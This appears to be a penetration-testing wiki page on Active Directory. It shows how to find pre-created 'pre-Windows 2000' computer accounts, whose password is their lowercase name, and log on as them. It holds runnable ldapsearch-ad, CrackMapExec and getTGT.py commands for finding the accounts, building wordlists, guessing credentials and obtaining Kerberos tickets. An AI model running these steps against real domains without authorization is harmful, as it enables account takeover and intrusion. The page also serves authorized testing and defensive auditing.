When a new computer account is configured as "pre-Windows 2000 computer", its password is set based on its name (i.e. lowercase computer name without the trailing $). When it isn't, the password is randomly generated.
Once an authentication occurs for a pre-Windows 2000 computer, according to TrustedSec's blogpost, its password will usually need to be changed.
Finding computer accounts that have been "pre-created" (i.e. manually created in ADUC instead of automatically added when joining a machine to the domain), but have never been used can be done by filtering the UserAccountControl attribute of all computer accounts and look for the value 4128 (32|4096) (deductible via the UserAccountControl flags):
- 32 -
PASSWD_NOTREQD - 4096 -
WORKSTATION_TRUST_ACCOUNT
The logonCount attribute can be filtered as well.
The ldapsearch-ad tool can be used to find such accounts. Once "pre-created" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with CrackMapExec (Python) for instance.
# 1. find pre-created accounts that never logged on
ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt
# 2. extract the sAMAccountNames of the results
cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt
# 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names
cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt
# 4. bruteforce, line per line (user1:password1, user2:password2, ...)
cme smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforceYou will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. (trustedsec.com)
Testers can then change the Pre-Windows 2000 computer accounts' password (i.e. rpcchangepwd.py, kpasswd.py, etc.) in order to use it.
{% hint style="success" %} Alternatively, Filip Dragovic was able to authenticate using Kerberos without having to change the account's password. (source)
getTGT.py $DOMAIN/$COMPUTER_NAME\$:$COMPUTER_PASSWORDThe ticket obtained can then be used with ptt.md {% endhint %}
{% embed url="https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/" %}
{% embed url="https://web.archive.org/web/20080205233505/http://support.microsoft.com/kb/320187" %}